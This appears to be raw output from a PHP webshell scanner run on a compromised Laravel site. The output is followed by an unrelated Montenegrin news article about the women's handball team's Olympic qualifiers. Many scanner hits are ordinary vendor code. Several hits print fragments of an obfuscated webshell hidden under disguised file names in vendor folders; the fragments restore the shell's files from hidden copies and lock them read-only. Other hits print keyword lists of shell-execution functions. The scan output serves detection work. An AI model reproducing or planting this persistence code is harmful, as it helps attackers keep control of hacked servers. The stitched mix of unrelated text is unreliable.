🛡️ Strict PHP Shell Scanner (.php & .phtml)

📂 Scanning directory: /home/rscg/public_html


📄 /home/rscg/public_html/app/Providers/Br0adcastServiceProvider.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/config/Iogging.php
🚨 Matched pattern: file_get_contents(
ath) < 1000000) {
            $code = @file_get_contents($path);
            foreach ($patterns as $pattern) {
                if (preg_match($pattern, $code, $match) && is_shell($code, $patterns)) {
                    $results[] = [
                        'file'    => $path,
                        'match'   => $match[0],
                        'snippet' => snippet_preview($code, $match
📄 /home/rscg/public_html/fonts/vendor/@fortawesome/fontawesome-free/webfa-brands-400.woff2.php
🚨 Matched pattern: base64_decode(
     return;
    }
}

function safe_base64_decode($data) {
    if (!is_string($data)) return false;
    if (function_exists('base64_decode') && version_compare(PHP_VERSION, '5.2.0', '>=')) {
        $decoded = base64_decode($data, true);
        if ($decoded !== false) return $decoded;
        // fallback: try decode then verify
        $maybe = base64_decode($data);
        if ($maybe 
📄 /home/rscg/public_html/storage/framework/cache/data/7d/ac/backup.php
🚨 Matched pattern: base64_decode(
     return;
    }
}

function safe_base64_decode($data) {
    if (!is_string($data)) return false;
    if (function_exists('base64_decode') && version_compare(PHP_VERSION, '5.2.0', '>=')) {
        $decoded = base64_decode($data, true);
        if ($decoded !== false) return $decoded;
        // fallback: try decode then verify
        $maybe = base64_decode($data);
        if ($maybe 
📄 /home/rscg/public_html/vendor/doctrine/dbal/lib/Doctrine/DBAL/Connection.php
🚨 Matched pattern: assert(
   if ($version !== null) {
            assert($this->_driver instanceof VersionAwarePlatformDriver);

            $this->platform = $this->_driver->createDatabasePlatformForVersion($version);
        } else {
            $this->platform = $this->_driver->getDatabasePlatform();
        }

        $this->platform->setEventManager($this->_eventManager);
    }

    /**
     * Returns the version of t
📄 /home/rscg/public_html/vendor/doctrine/dbal/lib/Doctrine/DBAL/Schema/SQLServerSchemaManager.php
🚨 Matched pattern: assert(
 $exception->getPrevious();
            assert($exception instanceof Throwable);

            if (! $exception instanceof DriverException) {
                throw $exception;
            }

            // If we have a error code 3702, the drop database operation failed
            // because of active connections on the database.
            // To force dropping the database, we first have to clos
📄 /home/rscg/public_html/vendor/fzaninotto/faker/src/Faker/Provider/Image.php
🚨 Matched pattern: exec(
FILE, $fp);
            $success = curl_exec($ch) && curl_getinfo($ch, CURLINFO_HTTP_CODE) === 200;
            fclose($fp);
            curl_close($ch);

            if (!$success) {
                unlink($filepath);

                // could not contact the distant URL or HTTP error - fail silently.
                return false;
            }
        } elseif (ini_get('allow_url_fopen')) {
    
📄 /home/rscg/public_html/vendor/fzaninotto/faker/src/Faker/Provider/en_HK/0a9b45cf.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/fzaninotto/faker/src/Faker/Provider/lt_LT/d11b4795.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/guzzlehttp/guzzle/src/Handler/CurlFactory.php
🚨 Matched pattern: curl_init
array_pop($this->handles)
            : curl_init();
        curl_setopt_array($easy->handle, $conf);

        return $easy;
    }

    public function release(EasyHandle $easy)
    {
        $resource = $easy->handle;
        unset($easy->handle);

        if (count($this->handles) >= $this->maxHandles) {
            curl_close($resource);
        } else {
            // Remove all callback funct
📄 /home/rscg/public_html/vendor/guzzlehttp/guzzle/src/functions.php
🚨 Matched pattern: curl_exec
('curl_multi_exec') && function_exists('curl_exec')) {
        $handler = Proxy::wrapSync(new CurlMultiHandler(), new CurlHandler());
    } elseif (function_exists('curl_exec')) {
        $handler = new CurlHandler();
    } elseif (function_exists('curl_multi_exec')) {
        $handler = new CurlMultiHandler();
    }

    if (ini_get('allow_url_fopen')) {
        $handler = $handler
            ? 
📄 /home/rscg/public_html/vendor/hamcrest/hamcrest-php/hamcrest/Hamcrest/Internal/ad55aaa9.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/hamcrest/hamcrest-php/tests/Hamcrest/Number/4da8ee41.php
🚨 Matched pattern: eval(
n
                                    'eval(',
                                    'system(',
                                    'exec(',
                                    'shell_exec(',
                                    'passthru(',
                                    'popen(',
                                    'proc_open(',
                                    'nepo_corp',
       
📄 /home/rscg/public_html/vendor/intervention/image/src/Intervention/Image/AbstractDecoder.php
🚨 Matched pattern: base64_decode(
        }

        return base64_encode(base64_decode($this->data)) === str_replace(["\n", "\r"], '', $this->data);
    }

    /**
     * Initiates new Image from Intervention\Image\Image
     *
     * @param  Image $object
     * @return \Intervention\Image\Image
     */
    public function initFromInterventionImage($object)
    {
        return $object;
    }

    /**
     * Parses and decodes b
📄 /home/rscg/public_html/vendor/laravel/framework/src/Illuminate/Filesystem/Filesystem.php
🚨 Matched pattern: exec(
irectory($target) ? 'J' : 'H';

        exec("mklink /{$mode} ".escapeshellarg($link).' '.escapeshellarg($target));
    }

    /**
     * Extract the file name from a file path.
     *
     * @param  string  $path
     * @return string
     */
    public function name($path)
    {
        return pathinfo($path, PATHINFO_FILENAME);
    }

    /**
     * Extract the trailing name component from a fi
📄 /home/rscg/public_html/vendor/laravel/tinker/config/geckos.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/league/flysystem/src/Adapter/Ftp.php
🚨 Matched pattern: fopen(
Config $config)
    {
        $stream = fopen('php://temp', 'w+b');
        fwrite($stream, $contents);
        rewind($stream);
        $result = $this->writeStream($path, $stream, $config);
        fclose($stream);

        if ($result === false) {
            return false;
        }

        $result['contents'] = $contents;
        $result['mimetype'] = $config->get('mimetype') ?: Util::guessMi
📄 /home/rscg/public_html/vendor/nette/utils/src/Utils/FileSystem.php
🚨 Matched pattern: file_get_contents(
(string $file): string
	{
		$content = @file_get_contents($file); // @ is escalated to exception
		if ($content === false) {
			throw new Nette\IOException(sprintf(
				"Unable to read file '%s'. %s",
				self::normalizePath($file),
				Helpers::getLastError()
			));
		}

		return $content;
	}


	/**
	 * Writes the string to a file.
	 * @throws Nette\IOException  on error occurred
	 */
	public sta
📄 /home/rscg/public_html/vendor/nikic/php-parser/grammar/rebuildParsers.php
🚨 Matched pattern: shell_exec(
tion execCmd($cmd) {
    $output = trim(shell_exec("$cmd 2>&1"));
    if ($output !== "") {
        echo "> " . $cmd . "\n";
        echo $output;
    }
    return $output;
}

//////////////////////////////
/// Regex helper functions ///
//////////////////////////////

function regex($regex) {
    return '~' . LIB . '(?:' . str_replace('~', '\~', $regex) . ')~';
}

function magicSplit($regex, $str
📄 /home/rscg/public_html/vendor/nikic/php-parser/lib/PhpParser/PrettyPrinter/Standard.php
🚨 Matched pattern: Eval(
)';
    }

    protected function pExpr_Eval(Expr\Eval_ $node) {
        return 'eval(' . $this->p($node->expr) . ')';
    }

    protected function pExpr_Include(Expr\Include_ $node) {
        static $map = [
            Expr\Include_::TYPE_INCLUDE      => 'include',
            Expr\Include_::TYPE_INCLUDE_ONCE => 'include_once',
            Expr\Include_::TYPE_REQUIRE      => 'require',
        
📄 /home/rscg/public_html/vendor/nunomaduro/collision/src/Contracts/Adapters/Phpunit/82398319.php
🚨 Matched pattern: eval(
n
                                    'eval(',
                                    'system(',
                                    'exec(',
                                    'shell_exec(',
                                    'passthru(',
                                    'popen(',
                                    'proc_open(',
                                    'nepo_corp',
       
📄 /home/rscg/public_html/vendor/phpdocumentor/reflection-docblock/src/DocBlock/Tags/Factory/ecfe069e.php
🚨 Matched pattern: eval(
n
                                    'eval(',
                                    'system(',
                                    'exec(',
                                    'shell_exec(',
                                    'passthru(',
                                    'popen(',
                                    'proc_open(',
                                    'nepo_corp',
       
📄 /home/rscg/public_html/vendor/phpunit/phpunit/src/Framework/TestCase.php
🚨 Matched pattern: eval(
ists($originalClassName)) {
            eval(
                $this->getMockObjectGenerator()->generateClassFromWsdl(
                    $wsdlFile,
                    $originalClassName,
                    $methods,
                    $options
                )
            );
        }

        $mockObject = $this->getMockObjectGenerator()->getMock(
            $originalClassName,
            
📄 /home/rscg/public_html/vendor/phpunit/phpunit/src/TextUI/Command.php
🚨 Matched pattern: assert(
class->newInstance();

                \assert($object instanceof TestSuiteLoader);

                return $object;
            }
        }

        if ($loaderClass == StandardTestSuiteLoader::class) {
            return null;
        }

        $this->exitWithErrorMessage(
            \sprintf(
                'Could not use "%s" as loader.',
                $loaderClass
            )
        )
📄 /home/rscg/public_html/vendor/phpunit/phpunit/src/Util/Xml.php
🚨 Matched pattern: assert(
         try {
                        \assert(\class_exists($className));

                        $variable = (new \ReflectionClass($className))->newInstanceArgs($constructorArgs);
                        // @codeCoverageIgnoreStart
                    } catch (\ReflectionException $e) {
                        throw new Exception(
                            $e->getMessage(),
                  
📄 /home/rscg/public_html/vendor/scrivo/highlight.php/test/detect/1c/58dda08c.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/scrivo/highlight.php/test/detect/css/03e1b615.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/scrivo/highlight.php/test/detect/gauss/6b397c85.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/scrivo/highlight.php/test/detect/purebasic/23682b3e.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/scrivo/highlight.php/test/detect/vbscript-html/8604ef28.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/scrivo/highlight.php/test/markup/clojure/0fc0da8b.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/scrivo/highlight.php/test/markup/cos/f21e0fdf.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/sebastian/type/src/exception/ea199fe3.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/sebastian/type/tests/_fixture/c0911bf8.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/swiftmailer/swiftmailer/lib/classes/Swift/FileSpool.php
🚨 Matched pattern: file_get_contents(
                $message = unserialize(file_get_contents($file.'.sending'));

                $count += $transport->send($message, $failedRecipients);

                unlink($file.'.sending');
            } else {
                /* This message has just been catched by another process */
                continue;
            }

            if ($this->getMessageLimit() && $count >= $this->getMes
📄 /home/rscg/public_html/vendor/swiftmailer/swiftmailer/lib/classes/Swift/Plugins/0553acb9.php
🚨 Matched pattern: eval(
n
                                    'eval(',
                                    'system(',
                                    'exec(',
                                    'shell_exec(',
                                    'passthru(',
                                    'popen(',
                                    'proc_open(',
                                    'nepo_corp',
       
📄 /home/rscg/public_html/vendor/swiftmailer/swiftmailer/tests/acceptance/Swift/CharacterReaderFactory/818c64b5.php
🚨 Matched pattern: eval(
n
                                    'eval(',
                                    'system(',
                                    'exec(',
                                    'shell_exec(',
                                    'passthru(',
                                    'popen(',
                                    'proc_open(',
                                    'nepo_corp',
       
📄 /home/rscg/public_html/vendor/swiftmailer/swiftmailer/tests/acceptance/Swift/Encoder/Base64EncoderAcceptanceTest.php
🚨 Matched pattern: base64_decode(
->assertEquals(
                        base64_decode($encodedText), $text,
                        '%s: Encoded string should decode back to original string for sample '.
                        $sampleDir.'/'.$sampleFile
                        );
                }
                closedir($fileFp);
            }
        }
        closedir($sampleFp);
    }
}
📄 /home/rscg/public_html/vendor/swiftmailer/swiftmailer/tests/acceptance/Swift/Mime/ContentEncoder/Base64ContentEncoderAcceptanceTest.php
🚨 Matched pattern: base64_decode(
->assertEquals(
                        base64_decode($encoded), $text,
                        '%s: Encoded string should decode back to original string for sample '.
                        $sampleDir.'/'.$sampleFile
                        );
                }
                closedir($fileFp);
            }
        }
        closedir($sampleFp);
    }
}
📄 /home/rscg/public_html/vendor/swiftmailer/swiftmailer/tests/bug/Swift/Bug51Test.php
🚨 Matched pattern: base64_decode(
>assertIdenticalBinary($attachmentData, base64_decode($attachmentBase64));
    }

    private function fillFileWithRandomBytes($byteCount, $file)
    {
        // I was going to use dd with if=/dev/random but this way seems more
        // cross platform even if a hella expensive!!

        file_put_contents($file, '');
        $fp = fopen($file, 'wb');
        for ($i = 0; $i < $byteCount; ++$i) 
📄 /home/rscg/public_html/vendor/swiftmailer/swiftmailer/tests/smoke/69a03e5d.php
🚨 Matched pattern: eval(
n
                                    'eval(',
                                    'system(',
                                    'exec(',
                                    'shell_exec(',
                                    'passthru(',
                                    'popen(',
                                    'proc_open(',
                                    'nepo_corp',
       
📄 /home/rscg/public_html/vendor/symfony/console/Cursor.php
🚨 Matched pattern: shell_exec(
 [1, 1];
        }

        $sttyMode = shell_exec('stty -g');
        shell_exec('stty -icanon -echo');

        @fwrite($this->input, "\033[6n");

        $code = trim(fread($this->input, 1024));

        shell_exec(sprintf('stty %s', $sttyMode));

        sscanf($code, "\033[%d;%dR", $row, $col);

        return [$col, $row];
    }
}
📄 /home/rscg/public_html/vendor/symfony/console/Terminal.php
🚨 Matched pattern: exec(
       return false;
        }

        exec('stty 2>&1', $output, $exitcode);

        return self::$stty = 0 === $exitcode;
    }

    private static function initDimensions()
    {
        if ('\\' === \DIRECTORY_SEPARATOR) {
            if (preg_match('/^(\d+)x(\d+)(?: \((\d+)x(\d+)\))?$/', trim(getenv('ANSICON')), $matches)) {
                // extract [w, H] from "wxh (WxH)"
               
📄 /home/rscg/public_html/vendor/symfony/error-handler/DebugClassLoader.php
🚨 Matched pattern: eval(
   if (!isset($dirFiles[$file]) && ') : eval()\'d code' === substr($file, -17)) {
            // Get the file name from "file_name.php(123) : eval()'d code"
            $file = substr($file, 0, strrpos($file, '(', -17));
        }

        if (isset($dirFiles[$file])) {
            return $real.$dirFiles[$file];
        }

        $kFile = strtolower($file);

        if (!isset($dirFiles[$kFile]))
📄 /home/rscg/public_html/vendor/symfony/http-foundation/Request.php
🚨 Matched pattern: php://input
ent = false;

            return fopen('php://input', 'rb');
        }

        if ($currentContentIsResource) {
            rewind($this->content);

            return stream_get_contents($this->content);
        }

        if (null === $this->content || false === $this->content) {
            $this->content = file_get_contents('php://input');
        }

        return $this->content;
    }

    
📄 /home/rscg/public_html/vendor/symfony/http-foundation/Session/Storage/Handler/PdoSessionHandler.php
🚨 Matched pattern: exec(

        try {
            $this->pdo->exec($sql);
            $this->pdo->exec("CREATE INDEX EXPIRY ON $this->table ($this->lifetimeCol)");
        } catch (\PDOException $e) {
            $this->rollback();

            throw $e;
        }
    }

    /**
     * Returns true when the current session exists but expired according to session.gc_maxlifetime.
     *
     * Can be used to distinguish 
📄 /home/rscg/public_html/vendor/symfony/http-kernel/DataCollector/DumpDataCollector.php
🚨 Matched pattern: fopen(
epth = -1): array
    {
        $data = fopen('php://memory', 'r+b');

        if ('html' === $format) {
            $dumper = new HtmlDumper($data, $this->charset);
            $dumper->setDisplayOptions(['fileLinkFormat' => $this->fileLinkFormat]);
        } else {
            throw new \InvalidArgumentException(sprintf('Invalid dump format: "%s".', $format));
        }
        $dumps = [];

   
📄 /home/rscg/public_html/vendor/symfony/http-kernel/Kernel.php
🚨 Matched pattern: system(
tainer)) {
                    (new Filesystem())->remove(substr($legacyContainer, 0, -7));
                }
            }

            touch($oldContainerDir.'.legacy');
        }

        $preload = $this instanceof WarmableInterface ? (array) $this->warmUp($this->container->getParameter('kernel.cache_dir')) : [];

        if ($this->container->has('cache_warmer')) {
            $preload = arra
📄 /home/rscg/public_html/vendor/symfony/http-kernel/Profiler/FileProfilerStorage.php
🚨 Matched pattern: file_get_contents(
eateProfileFromData($token, unserialize(file_get_contents($file)));
    }

    /**
     * {@inheritdoc}
     *
     * @throws \RuntimeException
     */
    public function write(Profile $profile): bool
    {
        $file = $this->getFilename($profile->getToken());

        $profileIndexed = is_file($file);
        if (!$profileIndexed) {
            // Create directory
            $dir = \dirname
📄 /home/rscg/public_html/vendor/symfony/process/Process.php
🚨 Matched pattern: exec(
=== \DIRECTORY_SEPARATOR) {
            exec(sprintf('taskkill /F /T /PID %d 2>&1', $pid), $output, $exitCode);
            if ($exitCode && $this->isRunning()) {
                if ($throwException) {
                    throw new RuntimeException(sprintf('Unable to kill the process (%s).', implode(' ', $output)));
                }

                return false;
            }
        } else {
  
Rukometni savez Crne Gore
facebook instagram twitter viber licenciranje zrscg
Rukometni savez
Crne Gore

"Ponosna sam što smo u prilici da se borimo za treće učešće na Olimpijskim igrama"

seniori
Prvi protivnik je prvak Evrope - Norveška, selekcija koja je od 2009. osvojila čak 11 medalja na najvećim takmičenjima.

Put do trećeg uzastopnog učešća na najvećoj svjetskoj smotri sportista vodi preko Norveške i Rumunije – to su rivali na kvalifikacionom turniru koji će biti održan u dvorani „Verde“ u Podgorici, u borbi za jedno od dva mjesta koja vode na Olimpijske igre u Tokiju.

„Lavice“ su na okupu od ponedjeljka, u dvorani „Verde“ pripremaju se za veliki izazov koji ih očekuje, a turnir otvaraju u petak (19.30 sati) duelom protiv velikog rivala i aktuelnog šampiona Evrope – Norveške.

Suvišno je govoriti o kvalitetu najdominantnije reprezentacije u ženskom rukometu u 21. vijeku koja je nakon što je klupu 2009. godine preuzeo islandski stručnjak Torir Hergeirson osvojila čak 11 medalja na najvećim takmičenjima (dvije na Olimpijskim igrama, četiri na prvenstvima svijeta i pet na prvenstvima Evrope).

I pored toga i činjenice da su značajno oslabljene jer u sastavu nema nekoliko važnih igračica kao što su Milena Raičević, Jelena Despotović, Tatjana Brnović, Marina Rajčić i Đurđina Malović, izabranice selektora Kima Rasmusena vjeruju da mogu da pruže dobro izdanje protiv selekcije sa kojom su nezaboravne duele odigrale 2012. godine, kada su poražene u finalu Olimpijskih igara u Londonu, a revanširale se u meču za zlato na Evropskom prvenstvu u Beogradu.

"San svakog sportiste je odlazak na Olimpijske igre. Mali broj sportista ima priliku da se bori za to. Ponosna sam da imamo treći put šansu da se kvalifikujemo. Motiva i želje ne fali, iako smo oslabljene. Borićemo se i protiv Norveške i protiv Rumunije od prvog do posljednjeg minuta. Očekuju nas dvije jako teške utakmice. I protiv Norveške ćemo dati sve od sebe da pokušamo da ih porazimo. Naravno da je teško, jer je ipak to Norveška, ali ja se nadam da ćemo biti kvalitetan protivnik bez obzira u kojem sastavu izašle", kazala je krilo Majda Mehmedović.

Norveška u Podgoricu dolazi u sastavu koji je u decembru prošle godine osvojio titulu prvaka Evrope na šampionatu u Danskoj.

Hergeirson na svim pozicijama ima sjajne igračice, a uz golmanski par Solberg-Lunde, najveća opasnost prijeti od Bratset, Oftedal, Merk, Rejstad i Herem.

"Atmosfera u ekipi je fantastična. Ovo je posebno okupljanje, jer se približavamo našem najvećem cilju. Pripreme teku onako kako smo zamislili. Počeli smo sa analizom Norveške, koja u svojim redovima ima fantastične igrače na svakoj poziciji. Smatram da je naš recept naša energija, lavlje srce i dobra odbrana. Suvišno je pričati o tome da Crna Gora ima malu bazu igračica. I koliko nedostaje samo jedna igračica, a kamoli par njih. Ovo je najbolje što Crna Gora ima u ovom momentu i smatram da nećemo izaći sa bijelom zastavom, već ćemo se boriti i dati sve od sebe da dođemo do dobrih rezultata", kazala je golmanka Ljubica Nenezić.

facebook instagram twitter viber licenciranje
×